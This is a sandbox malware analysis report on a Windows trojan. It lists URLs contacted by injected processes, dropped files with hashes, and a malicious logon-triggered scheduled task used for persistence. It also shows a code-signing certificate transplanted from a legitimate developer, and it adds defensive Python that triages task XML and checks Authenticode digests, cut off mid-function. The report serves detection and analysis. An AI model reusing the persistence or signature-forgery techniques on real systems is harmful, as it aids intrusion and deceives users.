                                                    http://www.6822662.xyz/uploads/images/2328450.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/fengxiangnaiya/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/tianshimeng/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/Dating/484e57698939.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.6822662.xyz/uploads/images/1214150.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.6822662.xyz/xidaoailiw/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.6822662.xyz/aiyinmaliya/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.learnnow.infoaDvThgRLSEMTIq.exe, 00000014.00000002.4781780276.000000000248C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.6822662.xyz/daqiaoweijiu/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.6822662.xyz/taonaimuxiangnai/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.6822662.xyz/uploads/images/8825750.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.6822662.xyz/jiuzhonghuannai/10/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/tianhaiyi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/Dating/188b57699235.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/Dating/077b57699346.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/zuozuomumingxi/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/diya/aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/Dating/273e57699150.htmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/uploads/images/7283490.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/Dating/831c57698592.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/jiuzhonghuannai/8/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/uploads/images/5809920.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/Dating/598f57698825.htmlaDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/uploads/images/2195710.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/uploads/images/4265400.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/lingcunailid/systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/uploads/images/303150.jpgsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZMsystray.exe, 00000013.00000002.4782860137.000000000596A000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000323A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.6822662.xyz/sitemap.xmlsystray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571280
Start date and time: 2024-12-09 08:41:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MN1qo2qaJmEvXDP.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/14@12/10
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 129
• Number of non-executed functions: 323
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:42:32 | API Interceptor | 1x Sleep call for process: MN1qo2qaJmEvXDP.exe modified
02:42:39 | API Interceptor | 53x Sleep call for process: powershell.exe modified
02:42:46 | API Interceptor | 1x Sleep call for process: rlJvZXSinaRi.exe modified
02:43:39 | API Interceptor | 10321815x Sleep call for process: systray.exe modified
08:42:41 | Task Scheduler | Run new task: rlJvZXSinaRi path: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.374957388473389
Encrypted: false
SSDEEP: 48:BWSeR4y4RQmFoULn+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:BLXyIFKEZZ2KRHWLOug8s
MD5: 5B61A650DDBD19386833671BFEAA7D03
SHA1: 16119835ED19E0EEEA72E4BCF0338643217AF665
SHA-256: 49339B2581277558BCF1D8CECBB0ED2FE6037F014F7B68568C6CAAA259724A8B
SHA-512: 624FCFC5418F1D5A579E9101DAF6E8698970EC5679843AEA44C930984186291C5109D900574798110B3063D41536BCB465820F391E50F4CA8EE58FA3A715B908
Malicious: false
Process: C:\Windows\SysWOW64\systray.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1220068301579391
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
MD5: 87EE0BBB38B11E14090EF60A7D56C8B1
SHA1: 37966F94007814B687989937B4A299FA816581ED
SHA-256: 22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
SHA-512: 37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                 Further copies:7 more dropped files, each written by powershell.exe, with the same size, entropy, SSDEEP, MD5/SHA1/SHA-256/SHA-512 and content as the entry above (PowerShell writes this probe file at start-up to determine whether AppLocker is in lockdown mode)
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1578
                                                                Entropy (8bit):5.1055260406330465
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtq/xvn:cge5QYrFdOFzOzN33ODOiDdKrsuTq5v
                                                                MD5:81A0D8EDF104CBFC37860BCDDFEBA5AA
                                                                SHA1:B667A2AE1E97FF099D56CC95DC7CB409354FAD1C
                                                                SHA-256:BF989598818385FCB2AF31DCF932BF905358F1704B6C29C61301A2DA42863D0F
                                                                SHA-512:807867FB8BED150BDD43876AD40511979BBD1E148AE90B3A53BD813170690A82879A735EBE7D738B229CA9083D6A343E162FA919250666B83DD56AF042ED0C57
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                Process:C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1578
                                                                Entropy (8bit):5.1055260406330465
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh51Ny1miUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtq/xvn:cge5QYrFdOFzOzN33ODOiDdKrsuTq5v
                                                                MD5:81A0D8EDF104CBFC37860BCDDFEBA5AA
                                                                SHA1:B667A2AE1E97FF099D56CC95DC7CB409354FAD1C
                                                                SHA-256:BF989598818385FCB2AF31DCF932BF905358F1704B6C29C61301A2DA42863D0F
                                                                SHA-512:807867FB8BED150BDD43876AD40511979BBD1E148AE90B3A53BD813170690A82879A735EBE7D738B229CA9083D6A343E162FA919250666B83DD56AF042ED0C57
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
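The two task definitions above are byte-identical (same size and hashes), one written by the submitted sample and one by its copy under AppData\Roaming. Both register a LogonTrigger for the registering user at LeastPrivilege, which is the persistence the "Scheduled temp file as task from temp location" Sigma hit and the schtasks.exe signature refer to. The Python below is an added example, not code from the report or from the sample: it parses a task definition in the same schema and surfaces the two properties an analyst acts on, the logon trigger and an action that runs from a user-writable directory. The report's preview stops inside <Settings>, so the <Actions> element in the constructed input is assumed; the command path in it is borrowed from the report's process list purely to exercise the check, and the benign task is likewise constructed.

```python
"""Triage of a Windows Task Scheduler XML definition.

Added example: not code from the Joe Sandbox report or from the sample.
The input below is constructed from the report's preview of the dropped
task file; its <Actions> element is an assumption, because the preview
stops inside <Settings>.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories a user can write to without elevation; a task whose action
# lives there is the "temp location" pattern the report's Sigma rule names.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)

# Constructed input modelled on the report's preview (Actions is assumed).
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison: fixed start time, system binary.
BENIGN_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger><StartBoundary>2024-12-05T02:20:30</StartBoundary></TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Windows\System32\cmd.exe</Command><Arguments>/c echo ok</Arguments></Exec>
  </Actions>
</Task>"""


def _text(parent, path):
    node = parent.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def triage_task(xml_text):
    """Return the enabled triggers, exec commands, run level and findings."""
    root = ET.fromstring(xml_text)
    triggers_el = root.find("t:Triggers", NS)
    # A trigger without <Enabled> is enabled; only an explicit "false" disables it.
    enabled = [
        t.tag.split("}", 1)[1]
        for t in (list(triggers_el) if triggers_el is not None else [])
        if _text(t, "t:Enabled").lower() != "false"
    ]
    commands = [_text(e, "t:Command") for e in root.iterfind("t:Actions/t:Exec", NS)]
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    findings = []
    if "LogonTrigger" in enabled:
        findings.append("re-executes at every logon of the registering user")
    for cmd in commands:
        if USER_WRITABLE.search(cmd):
            findings.append("action runs from a user-writable path: " + cmd)
    return {"triggers": enabled, "commands": commands, "run_level": run_level, "findings": findings}


if __name__ == "__main__":
    for name, xml_text in (("dropped task", TASK_XML), ("benign task", BENIGN_XML)):
        result = triage_task(xml_text)
        print(name, result["triggers"], result["findings"])
```

The check deliberately does not key on the task name or the sample's file name, both of which are random per build; the logon trigger plus a command under AppData is what survives across FormBook droppers, and the same function can be pointed at the XML files exported from C:\Windows\System32\Tasks on a live host.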
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):842760
                                                                Entropy (8bit):7.737339380759165
                                                                Encrypted:false
                                                                SSDEEP:24576:Lx/DmnP3X/QErFdcdfeTN+g5IFCohQgSfy:9m3hr3cQTgg5IFJuu
                                                                MD5:B5554D36A6FCA18D2BBA3D41D4070539
                                                                SHA1:9CA275CF18F4796B97748DDB7E1525B997206293
                                                                SHA-256:2A9F7757A2446C5DCAE00827C59C685AE20F44F182A169E9C74304B04AED9D60
                                                                SHA-512:3A31020228F7049F4EAB4147A53DB8BFEC39E049AB23C49928292800F356F9A2E583ECA616A7BC4BC346C3DE207C7334DC68A7D302BF1AEE990312BFAD0E1260
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg..............0.............>.... ........@.. ....................................@....................................W........................6........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...................9...................................................j....T..^?.a. .{....BS&..!.[J.Z..>o.<7.Su..#..C.y8...'.D...Llx.%..Vu....o_..bVA....}..J)@....6.....C.?...3=.].1.Z.....I..a(N.!.k.Ua..........%..&../.e..5......n......b-.zv.7x[.....8 %~......5b.P.ze......@......1.[RQW...%.8$lW..v%4Q.M....g.*....H...........[.l..yR...3]..l5.Z.S...{p....)..=..}..f.....Xf...B.Z..O.!..Y...^,...a..1(H.b..2....L.z..{........b..1p^ ..B.]T..\...9.N.p...Px.G..
                                                                Process:C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.737339380759165
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:MN1qo2qaJmEvXDP.exe
                                                                File size:842'760 bytes
                                                                MD5:b5554d36a6fca18d2bba3d41d4070539
                                                                SHA1:9ca275cf18f4796b97748ddb7e1525b997206293
                                                                SHA256:2a9f7757a2446c5dcae00827c59c685ae20f44f182a169e9c74304b04aed9d60
                                                                SHA512:3a31020228f7049f4eab4147a53db8bfec39e049ab23c49928292800f356f9a2e583eca616a7bc4bc346c3de207c7334dc68a7d302bf1aee990312bfad0e1260
                                                                SSDEEP:24576:Lx/DmnP3X/QErFdcdfeTN+g5IFCohQgSfy:9m3hr3cQTgg5IFJuu
                                                                TLSH:D905E19C7640B44FC943CD358EA4FD74EA246DAA9707C20365D72EEFB91E95B8E040E2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qg..............0.............>.... ........@.. ....................................@................................
                                                                Icon Hash:0697f0b9b0b1d827
                                                                Entrypoint:0x4ca53e
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67510DEE [Thu Dec 5 02:20:30 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Signature Valid:false
                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                 Not Before:12/11/2018 19:00:00
                                                                 Not After:08/11/2021 18:59:59
                                                                Subject Chain
                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                Version:3
                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                Serial:7C1118CBBADC95DA3752C46E47A27438
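The signature fields above fit together: the file carries a certificate table ("Digitally signed: true"), the leaf certificate belongs to Simon Tatham, the PuTTY author, was issued by COMODO and expired in 2021, the PE timestamp is December 2024, and validation fails with "The digital signature of the object did not verify" (error -2146869232 is 0x80096010, TRUST_E_BAD_DIGEST). That error is the Authenticode digest check: the hash sealed inside the PKCS#7 blob does not match the hash of this binary, which is what happens when a certificate table is copied from a legitimately signed file onto a different executable. The Python below is an added example, not code from the report or from the sample. It builds a constructed minimal PE32 (every layout value in it is an assumption) and computes the Authenticode-style digest to show which parts of the file the sealed hash ignores (CheckSum, the Security directory entry, the certificate table) and which it catches (any change to headers or section data). It does not parse the PKCS#7 structure itself.

```python
"""Authenticode-style digest of a PE, on a constructed minimal PE32.

Added example: not code from the Joe Sandbox report or from the sample.
The digest sealed in a certificate table covers the PE minus the CheckSum
field, the Security data-directory entry and the certificate table itself,
so a transplanted signature block still parses but never verifies.
"""
import hashlib
import struct

# Layout of the constructed file (assumed, not taken from the report).
PE_OFF = 0x40               # e_lfanew: PE signature right after the DOS header
SECTION_RAW = 0x200         # .text raw data starts at file offset 512
SECTION_SIZE = 0x200        # and is 512 bytes long


def build_pe(code, cert_blob=b"", checksum=0):
    """Assemble a one-section PE32, optionally with a trailing certificate table."""
    assert len(code) <= SECTION_SIZE
    dos = bytearray(PE_OFF)
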